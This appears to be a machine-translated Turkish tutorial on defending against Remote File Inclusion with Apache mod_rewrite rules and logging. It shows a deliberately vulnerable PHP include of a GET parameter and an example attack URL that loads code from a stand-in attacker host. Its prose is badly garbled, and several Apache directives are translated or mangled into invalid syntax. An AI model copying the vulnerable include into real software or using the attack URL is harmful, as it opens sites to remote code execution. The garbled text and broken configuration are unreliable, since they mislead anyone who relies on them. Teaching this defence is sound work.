Uzak dosya dahil önlemek için mod_rewrite kullanarak

Web siteleri yaşadığı en sık saldırılar biri teorik bir saldırı söz kötü niyetli kod içeren dosyaları eklemek girişimi aracılığıyla yapılır bunu gerçekleştirmek için çok basit olduğu için kötü niyetli kod ve türüne bir URL içeren bir dosya tarayıcı.

Remote File Inclusion için teknik terim veya RFI için basit kısaltması ile bilinen saldırı, bu tür genellikle genellikle web sitelerinin güvenliğini tehlikeye yapılan saldırı XSA adında bir mod (Cross-Sunucu Attack) ile ilişkili değilse Web sunucusu, RFI için daha da tehlikeli kılan bir faktör.

Bir saldırı RFI başlatmak için, bir saldırganın uzaktan da dahil olmak için hangi bir uygulama içinde bir "bellek" ihtiyacı, bu "boşluk" genel bir "delik" (hata) 'dir Bu güvenlik açığı bulunan bir komut dosyası yapar güvenlik.
RFI duyarlı bir sızıntı klasik durum böyle kod sadece basit bir parça bir uygulama tehlikeye, değişken adları ile sayfa geçen ilgilidir:

 



 # Geçti sorgu dizesi değişken üzerinden dosya dahil







 include ($ _GET ['sayfa']);

 

Kodda biz tanımlanmamış bir değişken varsa veya önerilen liste içeren sayfaya doğrudan URL şu şekilde görünecektir eğer yerine, örneğin, sorgu dizesi aracılığıyla gönderilen parametrelere göre belirlenecek:

 



 http://www.sito.com/index.php?pagina=news.php

 

değişken $ sayfa değeri "Haberler" Bu uygulamayı bir saldırı bu şekilde idam olabilir eşittir:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

Başarılı bir saldırı durumunda dosya "x.php", kötü niyetli kod her türlü içeren ve hasar çok daha büyük ve kesin saldırı basit düşünmek yapılabilir daha neden olabilir.

Neyse ki, bu tür saldırıları önlemek için kullanılabilecek bazı savunma teknikleri bu kısa tartışma sırasında biz yöntemlerle kullanılabilir Apache Web sunucusu tarafından sağlanan URL yeniden yazma modülü (mod_rewrite) dayalı bir analiz eder, var farklı.

Apache Web sunucusuna talimatları göndermek için en klasik biri saldırıdan korumak istediğiniz klasörü dahil edilecek bir klasik. Htaccess dosyası kullanmaktır.

Kullandığımız ilk yöntem a. Htaccess dosyasında basit bir kural eklemek için:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

("{QUERY_STRING}") bir sorgu dizesi olarak formüle ettiği kural devletlerin soneklerini "http", "https" ve "ftp" olursa olsun önceki ya da sonraki hangi içerik içeren tartışmalar geçti olamaz ("(.*)" ) parametreleri. Bu durumda web sunucu türü 403 (yasak) bir hata döndürecektir.

Apache (httpd.conf) yapılandırma dosyasına doğrudan erişim olanağı olanlar, bir direktif içeren tek bir kap içinde eklenebilir prededentemente belirlenen kurallara benzer bir etkiye sahip olabilir:

 # Mod_rewrite mevcut olup olmadığını kontrol edin







 <IfModule Mod_rewrite.c>







 # URL yeniden yazma motoru etkinleştirin

 





 RewriteEngine üzerinde

 





 # Biz RFI karşı kural seti







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Dahil olası istekleri filtreleme ve işaretlemek







 Çevre ile # Vraibile [E = Değişkenadı: değer]







 ^(.+)$ RewriteRule - [F, E = RFI: true]

 





 </ IfModule>

 





 # Creaimo RFI çalışır biz identficato bir günlüğünü







 # Daha önce bir "ortam değişkeni" kullanarak







 CustomLog / Klasör_adı / rfi.log kombine env = rfi

Konfigürasyon dosyası için direktif yazdıktan sonra, değişikliklerinizi kaydetmek ve etkili olması için Web sunucusu yeniden başlatın, listenin sonunda ve dış kabın bir günlük dosyası oluşturmak için talep takılı olduğunu belirtmeliyiz Bu küçük izleme, uzaktan dosya dahil etme istekleri kaydetmek amacıyla "RFI saldırı engelleme notlar," bizim Web sitelerine Remote File Inclusion girişimleri daha az yaygın olduğunu keşfedeceksiniz inanıyordu.